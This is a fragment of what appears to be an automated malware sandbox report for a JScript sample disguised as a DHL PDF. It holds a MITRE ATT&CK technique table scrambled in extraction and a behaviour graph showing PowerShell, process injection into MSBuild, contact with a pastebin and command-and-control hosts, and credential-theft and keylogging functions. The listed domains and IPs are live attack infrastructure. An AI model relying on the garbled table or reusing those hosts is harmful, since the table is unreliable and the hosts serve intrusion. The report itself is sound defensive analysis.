          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		13
          Obfuscated Files or Information          		211
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol211
          Input Capture          		12
          Ingress Tool Transfer          		Exfiltration Over Bluetooth1
          Defacement
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		1
          Windows Service          		1
          Windows Service          		1
          DLL Side-Loading          		2
          Credentials In Files          		1
          System Service Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		21
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          Service Execution          		Login Hook322
          Process Injection          		11
          Masquerading          		NTDS3
          File and Directory Discovery          		Distributed Component Object ModelInput Capture1
          Non-Standard Port          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud Accounts2
          PowerShell          		Network Logon ScriptNetwork Logon Script21
          Virtualization/Sandbox Evasion          		LSA Secrets33
          System Information Discovery          		SSHKeylogging2
          Non-Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation          		Cached Domain Credentials21
          Security Software Discovery          		VNCGUI Input Capture113
          Application Layer Protocol          		Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items322
          Process Injection          		DCSync21
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1619144 Sample: DHL RPA GRBP Template.PDF.js Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 29 paste.ee 2->29 31 stakloram.rs 2->31 33 5 other IPs or domains 2->33 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 57 12 other signatures 2->57 9 wscript.exe 1 14 2->9         started        13 wscript.exe 2->13         started        signatures3 55 Connects to a pastebin service (likely for C&C) 29->55 process4 dnsIp5 39 paste.ee 23.186.113.60, 443, 49762 KLAYER-GLOBALNL Reserved 9->39 67 System process connects to network (likely due to code injection or exploit) 9->67 69 JScript performs obfuscated calls to suspicious functions 9->69 71 Suspicious powershell command line found 9->71 73 3 other signatures 9->73 15 powershell.exe 14 16 9->15         started        signatures6 process7 dnsIp8 41 stakloram.rs 37.27.124.176, 443, 49837 UNINETAZ Iran (ISLAMIC Republic Of) 15->41 43 ip.3005.filemail.com 193.30.119.105, 443, 49802 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 15->43 45 Writes to foreign memory regions 15->45 47 Injects a PE file into a foreign processes 15->47 19 MSBuild.exe 2 15 15->19         started        23 cmd.exe 1 15->23         started        25 conhost.exe 15->25         started        signatures9 process10 dnsIp11 35 meme.linkpc.net 109.248.150.195, 3174, 49850 DATACLUBLV Russian Federation 19->35 37 geoplugin.net 178.237.33.50, 49861, 80 ATOM86-ASATOM86NL Netherlands 19->37 59 Contains functionalty to change the wallpaper 19->59 61 Contains functionality to steal Chrome passwords or cookies 19->61 63 Contains functionality to register a low level keyboard hook 19->63 65 3 other signatures 19->65 27 conhost.exe 23->27         started        signatures12 process13

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.